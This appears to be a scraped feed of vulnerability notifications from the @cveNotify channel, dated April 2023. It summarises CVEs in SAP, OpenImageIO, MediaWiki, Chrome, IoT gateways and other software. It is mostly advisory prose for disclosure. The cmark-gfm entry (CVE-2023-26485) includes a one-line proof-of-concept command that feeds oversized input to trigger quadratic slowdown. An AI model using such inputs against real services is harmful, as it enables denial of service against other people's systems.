🚨 CVE-2023-28763SAP NetWeaver AS for ABAP and ABAP Platform - versions 740, 750, 751, 752, 753, 754, 755, 756, 757, 791, allows an attacker authenticated as a non-administrative user to craft a request with certain parameters which can consume the server's resources sufficiently to make it unavailable over the network without any user interaction.🎖@cveNotify |
|
| 2023-04-11 15:58:20 |
🚨 CVE-2023-28765An attacker with basic privileges in SAP BusinessObjects Business Intelligence Platform (Promotion Management) - versions 420, 430, can get access to lcmbiar file and further decrypt the file. After this attacker can gain access to BI user’s passwords and depending on the privileges of the BI user, the attacker can perform operations that can completely compromise the application.🎖@cveNotify |
|
| 2023-04-11 15:58:19 |
🚨 CVE-2023-29108The IP filter in ABAP Platform and SAP Web Dispatcher - versions WEBDISP 7.85, 7.89, KERNEL 7.85, 7.89, 7.91, may be vulnerable by erroneous IP netmask handling. This may enable access to backend applications from unwanted sources.🎖@cveNotify |
|
| 2023-04-11 15:58:18 |
🚨 CVE-2023-29109The SAP Application Interface Framework (Message Dashboard) - versions AIF 703, AIFX 702, S4CORE 101, SAP_BASIS 755, 756, SAP_ABA 75C, 75D, 75E, application allows an Excel formula injection. An authorized attacker can inject arbitrary Excel formulas into fields like the Tooltip of the Custom Hints List. Once the victim opens the downloaded Excel document, the formula will be executed. As a result, an attacker can cause limited impact on the confidentiality and integrity of the application.🎖@cveNotify |
|
| 2023-04-11 15:58:16 |
🚨 CVE-2023-29110The SAP Application Interface (Message Dashboard) - versions AIF 703, AIFX 702, S4CORE 100, 101, SAP_BASIS 755, 756, SAP_ABA 75C, 75D, 75E, application allows the usage HTML tags. An authorized attacker can use some of the basic HTML codes such as heading, basic formatting and lists, then an attacker can inject images from the foreign domains. After successful exploitations, an attacker can cause limited impact on the confidentiality and integrity of the application.🎖@cveNotify |
|
| 2023-04-11 15:58:15 |
🚨 CVE-2023-29111The SAP AIF (ODATA service) - versions 755, 756, discloses more detailed information than is required. An authorized attacker can use the collected information possibly to exploit the component. As a result, an attacker can cause a low impact on the confidentiality of the application.🎖@cveNotify |
|
| 2023-04-11 15:58:14 |
🚨 CVE-2023-29112The SAP Application Interface (Message Monitoring) - versions 600, 700, allows an authorized attacker to input links or headings with custom CSS classes into a comment. The comment will render links and custom CSS classes as HTML objects. After successful exploitations, an attacker can cause limited impact on the confidentiality and integrity of the application.🎖@cveNotify |
|
| 2023-04-11 15:58:13 |
🚨 CVE-2023-29185SAP NetWeaver AS for ABAP (Business Server Pages) - versions 700, 701, 702, 731, 740, 750, 751, 752, 753, 754, 755, 756, 757, allows an attacker authenticated as a non-administrative user to craft a request with certain parameters in certain circumstances which can consume the server's resources sufficiently to make it unavailable over the network without any user interaction.🎖@cveNotify |
|
| 2023-04-11 15:58:12 |
🚨 CVE-2023-29186In SAP NetWeaver (BI CONT ADDON) - versions 707, 737, 747, 757, an attacker can exploit a directory traversal flaw in a report to upload and overwrite files on the SAP server. Data cannot be read but if a remote attacker has sufficient (administrative) privileges then potentially critical OS files can be overwritten making the system unavailable.🎖@cveNotify |
|
| 2023-04-11 10:58:35 |
🚨 CVE-2023-26593CENTUM series provided by Yokogawa Electric Corporation are vulnerable to cleartext storage of sensitive information. If an attacker who can login or access the computer where the affected product is installed tampers the password file stored in the computer, the user privilege which CENTUM managed may be escalated. As a result, the control system may be operated with the escalated user privilege. To exploit this vulnerability, the following prerequisites must be met: (1)An attacker has obtained user credentials where the affected product is installed, (2)CENTUM Authentication Mode is used for user authentication when CENTUM VP is used. The affected products and versions are as follows: CENTUM CS 1000, CENTUM CS 3000 (Including CENTUM CS 3000 Entry Class) R2.01.00 to R3.09.50, CENTUM VP (Including CENTUM VP Entry Class) R4.01.00 to R4.03.00, R5.01.00 to R5.04.20, and R6.01.00 and later, B/M9000 CS R5.04.01 to R5.05.01, and B/M9000 VP R6.01.01 to R7.04.51 and R8.01.01 and later🎖@cveNotify |
|
| 2023-04-11 10:58:34 |
🚨 CVE-2023-27389Inadequate encryption strength vulnerability in CONPROSYS IoT Gateway products allows a remote authenticated attacker with an administrative privilege to apply a specially crafted Firmware update file, alter the information, cause a denial-of-service (DoS) condition, and/or execute arbitrary code. The affected products and versions are as follows: M2M Gateway with the firmware Ver.3.7.10 and earlier (CPS-MG341-ADSC1-111, CPS-MG341-ADSC1-931, CPS-MG341G-ADSC1-111, CPS-MG341G-ADSC1-930, and CPS-MG341G5-ADSC1-931), M2M Controller Integrated Type with firmware Ver.3.7.6 and earlier versions (CPS-MC341-ADSC1-111, CPS-MC341-ADSC1-931, CPS-MC341-ADSC2-111, CPS-MC341G-ADSC1-110, CPS-MC341Q-ADSC1-111, CPS-MC341-DS1-111, CPS-MC341-DS11-111, CPS-MC341-DS2-911, and CPS-MC341-A1-111), and M2M Controller Configurable Type with firmware Ver.3.8.8 and earlier versions (CPS-MCS341-DS1-111, CPS-MCS341-DS1-131, CPS-MCS341G-DS1-130, CPS-MCS341G5-DS1-130, and CPS-MCS341Q-DS1-131).🎖@cveNotify |
|
| 2023-04-11 10:58:32 |
🚨 CVE-2023-27520Cross-site request forgery (CSRF) vulnerability in SEIKO EPSON printers/network interface Web Config allows a remote unauthenticated attacker to hijack the authentication and perform unintended operations by having a logged-in user view a malicious page. [Note] Web Config is the software that allows users to check the status and change the settings of SEIKO EPSON printers/network interface via a web browser. According to SEIKO EPSON CORPORATION, it is also called as Remote Manager in some products. Web Config is pre-installed in some printers/network interface provided by SEIKO EPSON CORPORATION. For the details of the affected product names/model numbers, refer to the information provided by the vendor.🎖@cveNotify |
|
| 2023-04-11 10:58:31 |
🚨 CVE-2023-27917OS command injection vulnerability in CONPROSYS IoT Gateway products allows a remote authenticated attacker who can access Network Maintenance page to execute arbitrary OS commands with a root privilege. The affected products and versions are as follows: M2M Gateway with the firmware Ver.3.7.10 and earlier (CPS-MG341-ADSC1-111, CPS-MG341-ADSC1-931, CPS-MG341G-ADSC1-111, CPS-MG341G-ADSC1-930, and CPS-MG341G5-ADSC1-931), M2M Controller Integrated Type with firmware Ver.3.7.6 and earlier versions (CPS-MC341-ADSC1-111, CPS-MC341-ADSC1-931, CPS-MC341-ADSC2-111, CPS-MC341G-ADSC1-110, CPS-MC341Q-ADSC1-111, CPS-MC341-DS1-111, CPS-MC341-DS11-111, CPS-MC341-DS2-911, and CPS-MC341-A1-111), and M2M Controller Configurable Type with firmware Ver.3.8.8 and earlier versions (CPS-MCS341-DS1-111, CPS-MCS341-DS1-131, CPS-MCS341G-DS1-130, CPS-MCS341G5-DS1-130, and CPS-MCS341Q-DS1-131).🎖@cveNotify |
|
| 2023-04-11 10:58:30 |
🚨 CVE-2023-28368TP-Link L2 switch T2600G-28SQ firmware versions prior to 'T2600G-28SQ(UN)_V1_1.0.6 Build 20230227' uses vulnerable SSH host keys. A fake device may be prepared to spoof the affected device with the vulnerable host key.If the administrator may be tricked to login to the fake device, the credential information for the affected device may be obtained.🎖@cveNotify |
|
| 2023-04-11 10:58:29 |
🚨 CVE-2022-36440A reachable assertion was found in Frrouting frr-bgpd 8.3.0 in the peek_for_as4_capability function. Attackers can maliciously construct BGP open packets and send them to BGP peers running frr-bgpd, resulting in DoS.🎖@cveNotify |
|
| 2023-04-11 10:58:28 |
🚨 CVE-2022-38922BluePage CMS thru 3.9 processes an insufficiently sanitized HTTP Header Cookie value allowing MySQL Injection in the 'users-cookie-settings' token using a Time-based blind SLEEP payload.🎖@cveNotify |
|
| 2023-04-11 10:58:27 |
🚨 CVE-2022-38923BluePage CMS thru v3.9 processes an insufficiently sanitized HTTP Header allowing MySQL Injection in the 'User-Agent' field using a Time-based blind SLEEP payload.🎖@cveNotify |
|
| 2023-04-11 10:58:26 |
🚨 CVE-2023-28625mod_auth_openidc is an authentication and authorization module for the Apache 2.x HTTP server that implements the OpenID Connect Relying Party functionality. In versions 2.0.0 through 2.4.13.1, when `OIDCStripCookies` is set and a crafted cookie supplied, a NULL pointer dereference would occur, resulting in a segmentation fault. This could be used in a Denial-of-Service attack and thus presents an availability risk. Version 2.4.13.2 contains a patch for this issue. As a workaround, avoid using `OIDCStripCookies`.🎖@cveNotify |
|
| 2023-04-11 10:58:25 |
🚨 CVE-2023-24824cmark-gfm is GitHub's fork of cmark, a CommonMark parsing and rendering library and program in C. A polynomial time complexity issue in cmark-gfm may lead to unbounded resource exhaustion and subsequent denial of service. This CVE covers quadratic complexity issues when parsing text which leads with either large numbers of `>` or `-` characters. This issue has been addressed in version 0.29.0.gfm.10. Users are advised to upgrade. Users unable to upgrade should validate that their input comes from trusted sources.🎖@cveNotify |
|
| 2023-04-11 10:58:23 |
🚨 CVE-2023-26485cmark-gfm is GitHub's fork of cmark, a CommonMark parsing and rendering library and program in C. A polynomial time complexity issue in cmark-gfm may lead to unbounded resource exhaustion and subsequent denial of service. This CVE covers quadratic complexity issues when parsing text which leads with either large numbers of `_` characters. This issue has been addressed in version 0.29.0.gfm.10. Users are advised to upgrade. Users unable to upgrade should validate that their input comes from trusted sources. ### Impact A polynomial time complexity issue in cmark-gfm may lead to unbounded resource exhaustion and subsequent denial of service. ### Proof of concept ``` $ ~/cmark-gfm$ python3 -c 'pad = "_" * 100000; print(pad + "." + pad, end="")' | time ./build/src/cmark-gfm --to plaintext ``` Increasing the number 10000 in the above commands causes the running time to increase quadratically. ### Patches This vulnerability have been patched in 0.29.0.gfm.10. ### Note on cmark and cmark-gfm XXX: TBD [cmark-gfm](https://github.com/github/cmark-gfm) is a fork of [cmark](https://github.com/commonmark/cmark) that adds the GitHub Flavored Markdown extensions. The two codebases have diverged over time, but share a common core. These bugs affect both `cmark` and `cmark-gfm`. ### Credit We would like to thank @gravypod for reporting this vulnerability. ### References https://en.wikipedia.org/wiki/Time_complexity ### For more information If you have any questions or comments about this advisory: * Open an issue in [github/cmark-gfm](https://github.com/github/cmark-gfm)🎖@cveNotify |
|
| 2023-04-11 10:58:22 |
🚨 CVE-2023-29141An issue was discovered in MediaWiki before 1.35.10, 1.36.x through 1.38.x before 1.38.6, and 1.39.x before 1.39.3. An auto-block can occur for an untrusted X-Forwarded-For header.🎖@cveNotify |
|
| 2023-04-11 10:58:21 |
🚨 CVE-2023-29140An issue was discovered in the GrowthExperiments extension for MediaWiki through 1.39.3. Attackers might be able to see edits for which the username has been hidden, because there is no check for rev_deleted.🎖@cveNotify |
|
| 2023-04-11 10:58:20 |
🚨 CVE-2023-29139An issue was discovered in the CheckUser extension for MediaWiki through 1.39.3. When a user with checkuserlog permissions makes many CheckUserLog API requests in some configurations, denial of service can occur (RequestTimeoutException or upstream request timeout).🎖@cveNotify |
|
| 2023-04-11 10:58:19 |
🚨 CVE-2023-23594An authentication bypass vulnerability in the web client interface for the CL4NX printer before firmware version 1.13.3-u724_r2 provides remote unauthenticated attackers with access to execute commands intended only for valid/authenticated users, such as file uploads and configuration changes.🎖@cveNotify |
|
| 2023-04-11 10:58:18 |
🚨 CVE-2023-28862An issue was discovered in LemonLDAP::NG before 2.16.1. Weak session ID generation in the AuthBasic handler and incorrect failure handling during a password check allow attackers to bypass 2FA verification. Any plugin that tries to deny session creation after the store step does not deny an AuthBasic session.🎖@cveNotify |
|
| 2023-04-11 10:58:16 |
🚨 CVE-2023-26121All versions of the package safe-eval are vulnerable to Prototype Pollution via the safeEval function, due to improper sanitization of its parameter content.🎖@cveNotify |
|
| 2023-04-11 10:58:15 |
🚨 CVE-2023-29492Novi Survey before 8.9.43676 allows remote attackers to execute arbitrary code on the server in the context of the service account. This does not provide access to stored survey or response data.🎖@cveNotify |
|
| 2023-04-11 10:58:14 |
🚨 CVE-2023-26122All versions of the package safe-eval are vulnerable to Sandbox Bypass due to improper input sanitization. The vulnerability is derived from prototype pollution exploitation.Exploiting this vulnerability might result in remote code execution ("RCE").**Vulnerable functions:**__defineGetter__, stack(), toLocaleString(), propertyIsEnumerable.call(), valueOf().🎖@cveNotify |
|
| 2023-04-11 10:58:13 |
🚨 CVE-2023-28205A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.7.5 and iPadOS 15.7.5, Safari 16.4.1, iOS 16.4.1 and iPadOS 16.4.1, macOS Ventura 13.3.1. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.🎖@cveNotify |
|
| 2023-04-11 05:58:37 |
🚨 CVE-2023-27269SAP NetWeaver Application Server for ABAP and ABAP Platform - versions 700, 701, 702, 731, 740, 750, 751, 752, 753, 754, 755, 756, 757, 791, allows an attacker with non-administrative authorizations to exploit a directory traversal flaw in an available service to overwrite the system files. In this attack, no data can be read but potentially critical OS files can be overwritten making the system unavailable.🎖@cveNotify |
|
| 2023-04-11 05:58:36 |
🚨 CVE-2023-27498SAP Host Agent (SAPOSCOL) - version 7.22, allows an unauthenticated attacker with network access to a server port assigned to the SAP Start Service to submit a crafted request which results in a memory corruption error. This error can be used to reveal but not modify any technical information about the server. It can also make a particular service temporarily unavailable🎖@cveNotify |
|
| 2023-04-11 05:58:35 |
🚨 CVE-2023-27500An attacker with non-administrative authorizations can exploit a directory traversal flaw in program SAPRSBRO to over-write system files. In this attack, no data can be read but potentially critical OS files can be over-written making the system unavailable.🎖@cveNotify |
|
| 2023-04-11 05:58:34 |
🚨 CVE-2023-27501SAP NetWeaver AS for ABAP and ABAP Platform - versions 700, 701, 702, 731, 740, 750, 751, 752, 753, 754, 755, 756, 757, 791, allows an attacker to exploit insufficient validation of path information provided by users, thus exploiting a directory traversal flaw in an available service to delete system files. In this attack, no data can be read but potentially critical OS files can be deleted making the system unavailable, causing significant impact on both availability and integrity🎖@cveNotify |
|
| 2023-04-11 05:58:32 |
🚨 CVE-2023-27893An attacker authenticated as a user with a non-administrative role and a common remote execution authorization in SAP Solution Manager and ABAP managed systems (ST-PI) - versions 2088_1_700, 2008_1_710, 740, can use a vulnerable interface to execute an application function to perform actions which they would not normally be permitted to perform. Depending on the function executed, the attack can read or modify any user or application data and can make the application unavailable.🎖@cveNotify |
|
| 2023-04-11 05:58:31 |
🚨 CVE-2023-27894SAP BusinessObjects Business Intelligence Platform (Web Services) - versions 420, 430, allows an attacker to inject arbitrary values as CMS parameters to perform lookups on the internal network which is otherwise not accessible externally. On successful exploitation, attacker can scan internal network to determine internal infrastructure for further attacks like remote file inclusion, retrieve server files, bypass firewall and force the vulnerable server to execute malicious requests, resulting in sensitive information disclosure. This causes limited impact on confidentiality of data.🎖@cveNotify |
|
| 2023-04-11 05:58:30 |
🚨 CVE-2023-27895SAP Authenticator for Android - version 1.3.0, allows the screen to be captured, if an authorized attacker installs a malicious app on the mobile device. The attacker could extract the currently views of the OTP and the secret OTP alphanumeric token during the token setup. On successful exploitation, an attacker can read some sensitive information but cannot modify and delete the data.🎖@cveNotify |
|
| 2023-04-11 05:58:28 |
🚨 CVE-2023-27896In SAP BusinessObjects Business Intelligence Platform - version 420, 430, an attacker can control a malicious BOE server, forcing the application server to connect to its own CMS, leading to a high impact on availability.🎖@cveNotify |
|
| 2023-04-11 05:58:27 |
🚨 CVE-2022-41649A heap out of bounds read vulnerability exists in the handling of IPTC data while parsing TIFF images in OpenImageIO v2.3.19.0. A specially-crafted TIFF file can cause a read of adjacent heap memory, which can leak sensitive process information. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2023-04-11 05:58:26 |
🚨 CVE-2022-41794A heap based buffer overflow vulnerability exists in the PSD thumbnail resource parsing code of OpenImageIO 2.3.19.0. A specially-crafted PSD file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2023-04-11 05:58:24 |
🚨 CVE-2022-41837An out-of-bounds write vulnerability exists in the OpenImageIO::add_exif_item_to_spec functionality of OpenImageIO Project OpenImageIO v2.4.4.2. Specially-crafted exif metadata can lead to stack-based memory corruption. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2023-04-11 05:58:23 |
🚨 CVE-2022-41838A code execution vulnerability exists in the DDS scanline parsing functionality of OpenImageIO Project OpenImageIO v2.4.4.2. A specially-crafted .dds can lead to a heap buffer overflow. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2023-04-11 05:58:22 |
🚨 CVE-2022-41977An out of bounds read vulnerability exists in the way OpenImageIO version v2.3.19.0 processes string fields in TIFF image files. A specially-crafted TIFF file can lead to information disclosure. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2023-04-11 05:58:20 |
🚨 CVE-2022-41981A stack-based buffer overflow vulnerability exists in the TGA file format parser of OpenImageIO v2.3.19.0. A specially-crafted targa file can lead to out of bounds read and write on the process stack, which can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2023-04-11 05:58:19 |
🚨 CVE-2022-41988An information disclosure vulnerability exists in the OpenImageIO::decode_iptc_iim() functionality of OpenImageIO Project OpenImageIO v2.3.19.0. A specially-crafted TIFF file can lead to a disclosure of sensitive information. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2023-04-11 05:58:18 |
🚨 CVE-2022-41999A denial of service vulnerability exists in the DDS native tile reading functionality of OpenImageIO Project OpenImageIO v2.3.19.0 and v2.4.4.2. A specially-crafted .dds can lead to denial of service. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2023-04-11 05:58:17 |
🚨 CVE-2022-43592An information disclosure vulnerability exists in the DPXOutput::close() functionality of OpenImageIO Project OpenImageIO v2.4.4.2. A specially crafted ImageOutput Object can lead to leaked heap data. An attacker can provide malicious input to trigger this vulnerability.🎖@cveNotify |
|
| 2023-04-11 05:58:16 |
🚨 CVE-2022-36354A heap out-of-bounds read vulnerability exists in the RLA format parser of OpenImageIO master-branch-9aeece7a and v2.3.19.0. More specifically, in the way run-length encoded byte spans are handled. A malformed RLA file can lead to an out-of-bounds read of heap metadata which can result in sensitive information leak. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2023-04-11 05:58:15 |
🚨 CVE-2022-43593A denial of service vulnerability exists in the DPXOutput::close() functionality of OpenImageIO Project OpenImageIO v2.4.4.2. A specially crafted ImageOutput Object can lead to null pointer dereference. An attacker can provide malicious input to trigger this vulnerability.🎖@cveNotify |
|
| 2023-04-11 05:58:14 |
🚨 CVE-2022-43594Multiple denial of service vulnerabilities exist in the image output closing functionality of OpenImageIO Project OpenImageIO v2.4.4.2. Specially crafted ImageOutput Objects can lead to multiple null pointer dereferences. An attacker can provide malicious multiple inputs to trigger these vulnerabilities.This vulnerability applies to writing .bmp files.🎖@cveNotify |
|
| 2023-04-10 20:58:39 |
🚨 CVE-2023-28205A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.7.5 and iPadOS 15.7.5, Safari 16.4.1, iOS 16.4.1 and iPadOS 16.4.1, macOS Ventura 13.3.1. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.🎖@cveNotify |
|
| 2023-04-10 20:58:38 |
🚨 CVE-2023-28206An out-of-bounds write issue was addressed with improved input validation. This issue is fixed in iOS 15.7.5 and iPadOS 15.7.5, macOS Monterey 12.6.5, iOS 16.4.1 and iPadOS 16.4.1, macOS Big Sur 11.7.6, macOS Ventura 13.3.1. An app may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited.🎖@cveNotify |
|
| 2023-04-10 20:58:37 |
🚨 CVE-2020-22533Cross Site Scripting vulnerability found in Zentao allows a remote attacker to execute arbitrary code via the lang parameter🎖@cveNotify |
|
| 2023-04-10 20:58:36 |
🚨 CVE-2020-19695Buffer Overflow found in Nginx NJS allows a remote attacker to execute arbitrary code via the njs_object_property parameter of the njs/njs_vm.c function.🎖@cveNotify |
|
| 2023-04-10 20:58:35 |
🚨 CVE-2023-26776Cross Site Scripting vulnerability found in Monitorr v.1.7.6 allows a remote attacker to execute arbitrary code via the title parameter of the post_receiver-services.php file.🎖@cveNotify |
|
| 2023-04-10 20:58:34 |
🚨 CVE-2020-23327Cross Site Scripting vulnerability found in ZblogCN ZblogPHP v.1.0 allows a local attacker to execute arbitrary code via a crafted payload in title parameter of the module management model.🎖@cveNotify |
|
| 2023-04-10 20:58:32 |
🚨 CVE-2023-26777Cross Site Scripting vulnerability found in :ouislam Uptime Kuma v.1.19.6 and before allows a remote attacker to execute arbitrary commands via the description, title, footer, and incident creation parameter of the status_page.js endpoint.🎖@cveNotify |
|
| 2023-04-10 20:58:31 |
🚨 CVE-2023-26855The hashing algorithm of ChurchCRM v4.5.3 utilizes a non-random salt value which allows attackers to use precomputed hash tables or dictionary attacks to crack the hashed passwords.🎖@cveNotify |
|
| 2023-04-10 20:58:30 |
🚨 CVE-2023-26775File Upload vulnerability found in Monitorr v.1.7.6 allows a remote attacker t oexecute arbitrary code via a crafted file upload to the assets/php/upload.php endpoint.🎖@cveNotify |
|
| 2023-04-10 20:58:29 |
🚨 CVE-2023-26750SQL injection vulnerability found in Yii Framework Yii 2 Framework before v.2.0.47 allows the a remote attacker to execute arbitrary code via the runAction function.🎖@cveNotify |
|
| 2023-04-10 20:58:25 |
🚨 CVE-2023-26733Buffer Overflow vulnerability found in tinyTIFF v.3.0 allows a local attacker to cause a denial of service via the TinyTiffReader_readNextFrame function in tinytiffreader.c file.🎖@cveNotify |
|
| 2023-04-10 20:58:24 |
🚨 CVE-2021-3267File Upload vulnerability found in KiteCMS v.1.1 allows a remote attacker to execute arbitrary code via the uploadFile function.🎖@cveNotify |
|
| 2023-04-10 20:58:23 |
🚨 CVE-2023-26437Denial of service vulnerability in PowerDNS Recursor allows authoritative servers to be marked unavailable.This issue affects Recursor: through 4.6.5, through 4.7.4 , through 4.8.3.🎖@cveNotify |
|
| 2023-04-10 20:58:22 |
🚨 CVE-2021-31707Permissions vulnerability found in KiteCMS allows a remote attacker to execute arbitrary code via the upload file type.🎖@cveNotify |
|
| 2023-04-10 20:58:21 |
🚨 CVE-2020-29312An issue found in Zend Framework v.3.1.3 and before allow a remote attacker to execute arbitrary code via the unserialize function.🎖@cveNotify |
|
| 2023-04-10 20:58:17 |
🚨 CVE-2021-28235Authentication vulnerability found in Etcd-io v.3.4.10 allows remote attackers to escalate privileges via the debug function.🎖@cveNotify |
|
| 2023-04-10 20:58:16 |
🚨 CVE-2020-23260An issue found in Jsish v.3.0.11 and before allows an attacker to cause a denial of service via the StringReplaceCmd function in the src/jsiChar.c file.🎖@cveNotify |
|
| 2023-04-10 20:58:15 |
🚨 CVE-2020-23258An issue found in Jsish v.3.0.11 allows a remote attacker to cause a denial of service via the Jsi_ValueIsNumber function in ./src/jsiValue.c file.🎖@cveNotify |
|
| 2023-04-10 20:58:14 |
🚨 CVE-2020-23257Buffer Overflow vulnerability found in Espruino 2v05.41 allows an attacker to cause a denial of service via the function jsvGarbageCollectMarkUsed in file src/jsvar.c.🎖@cveNotify |
|
| 2023-04-10 18:58:32 |
🚨 CVE-2022-4769Hitachi Vantara Pentaho Business Analytics Server prior to versions 9.4.0.0 and 9.3.0.2, including 8.3.x display the target path on host when a file is uploaded with an invalid character in its name.🎖@cveNotify |
|
| 2023-04-10 18:58:31 |
🚨 CVE-2023-29137An issue was discovered in the GrowthExperiments extension for MediaWiki through 1.39.3. The UserImpactHandler for GrowthExperiments inadvertently returns the timezone preference for arbitrary users, which can be used to de-anonymize users.🎖@cveNotify |
|
| 2023-04-10 18:58:30 |
🚨 CVE-2023-27160forem up to v2022.11.11 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /articles/{id}. This vulnerability allows attackers to access network resources and sensitive information via a crafted POST request.🎖@cveNotify |
|
| 2023-04-10 18:58:26 |
🚨 CVE-2022-2848This vulnerability allows remote attackers to execute arbitrary code on affected installations of Kepware KEPServerEX V6.11.718.0. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of text encoding conversions. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Was ZDI-CAN-16486.🎖@cveNotify |
|
| 2023-04-10 18:58:25 |
🚨 CVE-2023-28935** UNSUPPORTED WHEN ASSIGNED ** Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in Apache Software Foundation Apache UIMA DUCC. When using the "Distributed UIMA Cluster Computing" (DUCC) module of Apache UIMA, an authenticated user that has the permissions to modify core entities can cause command execution as the system user that runs the web process. As the "Distributed UIMA Cluster Computing" module for UIMA is retired, we do not plan to release a fix for this issue. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2023-04-10 18:58:24 |
🚨 CVE-2022-30350Avanquest Software RAD PDF (PDFEscape Online) 3.19.2.2 is vulnerable to Information Leak / Disclosure. The PDFEscape Online tool provides users with a "white out" functionality for redacting images, text, and other graphics from a PDF document. However, this mechanism does not remove underlying text or PDF object specification information from the PDF. As a result, for example, redacted text may be copy-pasted by a PDF reader.🎖@cveNotify |
|
| 2023-04-10 18:58:20 |
🚨 CVE-2023-1969A vulnerability classified as critical was found in SourceCodester Online Eyewear Shop 1.0. This vulnerability affects unknown code of the file /admin/inventory/manage_stock.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-225406 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-10 18:58:19 |
🚨 CVE-2023-26919delight-nashorn-sandbox 0.2.4 and 0.2.5 is vulnerable to sandbox escape. When allowExitFunctions is set to false, the loadWithNewGlobal function can be used to invoke the exit and quit methods to exit the Java process.🎖@cveNotify |
|
| 2023-04-10 18:58:18 |
🚨 CVE-2022-41976An privilege escalation issue was discovered in Scada-LTS 2.7.1.1 build 2948559113 allows remote attackers, authenticated in the application as a low-privileged user to change role (e.g., to administrator) by updating their user profile.🎖@cveNotify |
|
| 2023-04-10 18:58:14 |
🚨 CVE-2023-29375An issue was discovered in Progress Sitefinity 13.3 before 13.3.7647, 14.0 before 14.0.7736, 14.1 before 14.1.7826, 14.2 before 14.2.7930, and 14.3 before 14.3.8025. There is potentially dangerous file upload through the SharePoint connector.🎖@cveNotify |
|
| 2023-04-10 18:58:13 |
🚨 CVE-2022-30351PDFZorro PDFZorro Online r20220428 using TCPDF 6.2.5, despite having workflows claiming to correctly remove redacted information from a supplied PDF file, does not properly sanitize this information in all cases, causing redacted information, including images and text embedded in the PDF file, to be leaked unintentionally. In cases where PDF text objects are present it is possible to copy-paste redacted information into the system clipboard. Once a document is "locked" and marked for redaction once, all redactions performed after this feature is triggered are vulnerable.🎖@cveNotify |
|
| 2023-04-10 18:58:12 |
🚨 CVE-2023-0181NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in a kernel mode layer handler, where memory permissions are not correctly checked, which may lead to denial of service and data tampering.🎖@cveNotify |
|
| 2023-04-10 17:58:13 |
🚨 CVE-2022-43617This vulnerability allows remote attackers to execute arbitrary code on affected installations of Corel CorelDRAW Graphics Suite 23.5.0.506. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PCX files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-16372.🎖@cveNotify |
|
| 2023-04-10 17:58:12 |
🚨 CVE-2022-43616This vulnerability allows remote attackers to execute arbitrary code on affected installations of Corel CorelDRAW Graphics Suite 23.5.0.506. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of EMF images. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-16371.🎖@cveNotify |
|
| 2023-04-10 10:58:54 |
🚨 CVE-2023-26120This affects all versions of the package com.xuxueli:xxl-job. HTML uploaded payload executed successfully through /xxl-job-admin/user/add and /xxl-job-admin/user/update.🎖@cveNotify |
|
| 2023-04-10 06:59:40 |
🚨 CVE-2023-1816Incorrect security UI in Picture In Picture in Google Chrome prior to 112.0.5615.49 allowed a remote attacker to potentially perform navigation spoofing via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-04-10 06:59:39 |
🚨 CVE-2023-1817Insufficient policy enforcement in Intents in Google Chrome on Android prior to 112.0.5615.49 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-04-10 06:59:38 |
🚨 CVE-2023-1818Use after free in Vulkan in Google Chrome prior to 112.0.5615.49 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-04-10 06:59:37 |
🚨 CVE-2023-1819Out of bounds read in Accessibility in Google Chrome prior to 112.0.5615.49 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-04-10 06:59:36 |
🚨 CVE-2023-1820Heap buffer overflow in Browser History in Google Chrome prior to 112.0.5615.49 allowed a remote attacker who convinced a user to engage in specific UI interaction to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-04-10 06:59:32 |
🚨 CVE-2023-1821Inappropriate implementation in WebShare in Google Chrome prior to 112.0.5615.49 allowed a remote attacker to potentially hide the contents of the Omnibox (URL bar) via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2023-04-10 06:59:31 |
🚨 CVE-2023-1822Incorrect security UI in Navigation in Google Chrome prior to 112.0.5615.49 allowed a remote attacker to perform domain spoofing via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2023-04-10 06:59:30 |
